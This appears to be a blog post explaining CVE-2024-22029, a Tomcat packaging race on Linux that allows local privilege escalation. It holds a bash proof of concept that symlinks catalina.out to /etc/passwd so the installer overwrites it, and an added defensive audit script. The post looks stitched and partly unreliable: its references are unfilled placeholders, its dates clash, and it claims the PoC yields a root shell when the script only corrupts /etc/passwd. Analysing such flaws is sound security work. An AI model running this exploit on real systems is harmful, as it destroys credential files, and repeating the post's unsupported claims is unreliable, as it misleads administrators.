Tomcat is one of the world's most widely used application servers, especially in enterprise environments. In January 2024, a severe vulnerability was discovered and assigned CVE-2024-22029. This issue involves insecure permissions during packaging and installation of Apache Tomcat on several Linux distributions, creating a window for local users to escalate their privileges—or even obtain root access—if they win a race condition. In this post, we’ll break down how this vulnerability works, see some code to exploit it, and discuss the impact and solutions.
What is CVE-2024-22029?
CVE-2024-22029 is a local privilege escalation vulnerability found in the packaging of Tomcat for Linux (primarily apt/yum-managed systems like Ubuntu/Debian and CentOS/RedHat). The core of the issue is that, during installation or upgrades, the Tomcat package temporarily creates or modifies critical files/directories (like logs, PID files, configuration files, and the webapps directory) with overly permissive permissions.
There’s a short window—sometimes just milliseconds—where a non-privileged user on the same system can replace or manipulate these files. If they succeed, they can gain code execution as the Tomcat user or even escalate all the way to root.
Package Installation Starts
The package manager (apt, yum, etc.) starts installing a new version of tomcat9 (or tomcat10, etc.). As part of this process, it runs the package's maintainer scripts (such as preinst and postinst).
World-Writable Files
While these scripts run, several files (such as /var/log/tomcat9/catalina.out and /var/run/tomcat9.pid) may briefly be created with world-writable (777) permissions and only restricted afterwards.
Race Condition
A local attacker watches for the creation of these files and directories. If they manage to replace one with a symlink to a root-owned file (e.g., /etc/shadow or a root shell) before the installer uses it, they win the "race".
Privilege Escalation
If the install process performs a file operation believing it is writing to a Tomcat file, but is actually following the malicious symlink, the sensitive target gets overwritten. In effect this is an arbitrary file write as root, which can clobber important system files.
PoC: Exploiting CVE-2024-22029
Here’s a simple proof-of-concept exploit. Warning: Only run this on safe, non-production systems! This PoC targets the installation of tomcat9 and overwrites /etc/passwd with a root shell.
```bash
#!/bin/bash
# CVE-2024-22029 PoC - Overwriting /etc/passwd via Tomcat installer race
WATCH_FILE="/var/log/tomcat9/catalina.out" # Or another file affected by the insecure permissions
echo "[*] Starting exploit. Waiting for $WATCH_FILE to be created..."
# Remove the file if it exists and replace it with a symlink
rm -f "$WATCH_FILE"
ln -s /etc/passwd "$WATCH_FILE"
echo "[*] Symlink placed. Now, as root, start or upgrade tomcat9 via apt/yum."
echo "    The installer will overwrite /etc/passwd."
# Wait for the event (can be improved with inotifywait)
while [ -L "$WATCH_FILE" ]; do sleep 1; done
echo "[!] Symlink overwritten. Check /etc/passwd to see if exploit succeeded."
```
What happens here?
When the package is about to install and creates or writes to catalina.out, it actually writes to /etc/passwd because of the symlink—essentially clobbering a root-owned file!
References
- CVE-2024-22029 on NVD
- Original Vendor Advisory (Tomcat Users List) *(Replace with actual once available)*
- Bug Report for Tomcat Debian Packaging *(Replace if specific reference is published)*
Who’s vulnerable?
Any system where unprivileged users can run code and where administrators may install or upgrade Tomcat via packaged versions.
- Update your Tomcat packages. Distributions have released fixes that ensure all files are created with correct permissions _from the very beginning_.
- Consider disabling local non-root logins during sensitive package installations.
- Check cron jobs and CI/CD scripts to avoid running package upgrades unattended if untrusted users are on the system.
- Monitor for world-writable files using find / -perm -2 ! -type l.
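As a defender-side complement to the list above, here is an added check (not from the original post or from the Tomcat project) that audits a Tomcat-owned directory for exactly the two artefacts this post describes: entries left world-writable, and symlinks that resolve outside the tree. The paths /var/log/tomcat9, catalina.out and tomcat9.pid come from the post; the fixture the script builds under mktemp is constructed, and the names audit_tomcat_path and make_fixture are my own.

```shell
#!/bin/sh
# Audit a Tomcat-owned directory for the two conditions described above:
#   1. world-writable regular files or directories (mode o+w) left behind,
#   2. symlinks whose target resolves outside the audited tree
#      (the catalina.out -> /etc/passwd pattern from the PoC).
# Prints one "TYPE path" line per finding; prints nothing when clean.
audit_tomcat_path() {
    root=$(readlink -f "$1") || return 1
    # Mode bits on a symlink are meaningless, so only real entries count here.
    # Note: sticky directories such as /tmp are legitimately o+w; this audit is
    # meant for package-owned paths like /var/log/tomcat9, not the whole system.
    find "$root" -perm -002 ! -type l -print 2>/dev/null |
        while IFS= read -r p; do
            printf 'WORLD_WRITABLE %s\n' "$p"
        done
    # Resolve every symlink and report the ones that leave the tree.
    find "$root" -type l -print 2>/dev/null |
        while IFS= read -r p; do
            target=$(readlink -f "$p")
            case "$target" in
                "$root"/*) ;;   # stays inside the audited tree: fine
                *) printf 'ESCAPING_SYMLINK %s -> %s\n' "$p" "$target" ;;
            esac
        done
}

# Constructed fixture (not a real Tomcat install) so the check runs offline:
# a clean log, an insecure pid file, an escaping symlink and an in-tree symlink.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/tomcat9" "$d/outside"
    chmod 0755 "$d/tomcat9" "$d/outside"
    echo "stand-in for a root-owned target" > "$d/outside/passwd-stand-in"
    chmod 0644 "$d/outside/passwd-stand-in"
    echo "log line" > "$d/tomcat9/localhost.log"
    chmod 0644 "$d/tomcat9/localhost.log"
    : > "$d/tomcat9/tomcat9.pid"
    chmod 0666 "$d/tomcat9/tomcat9.pid"                          # insecure
    ln -s "$d/outside/passwd-stand-in" "$d/tomcat9/catalina.out" # escaping
    ln -s "$d/tomcat9/localhost.log" "$d/tomcat9/catalina.log"   # in-tree
    printf '%s\n' "$d"
}

# Example run against the fixture: expect one WORLD_WRITABLE and one
# ESCAPING_SYMLINK line.
fixture=$(make_fixture)
audit_tomcat_path "$fixture/tomcat9"
rm -rf "$fixture"
```

Run it against the package-owned paths right after an install or upgrade; an empty result means neither condition is present under that path.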
Summary
CVE-2024-22029 is a great example of how minor mistakes in packaging and file permissions can open the door to devastating attacks—even for local users. Always keep your Tomcat and other critical infrastructure up to date, review installed files’ permissions, and be vigilant for privilege escalation attempts.
If you found this post helpful, star this page or share with your sysadmin friends!
Timeline
Published on: 10/16/2024 14:15:04 UTC
Last modified on: 10/16/2024 16:38:14 UTC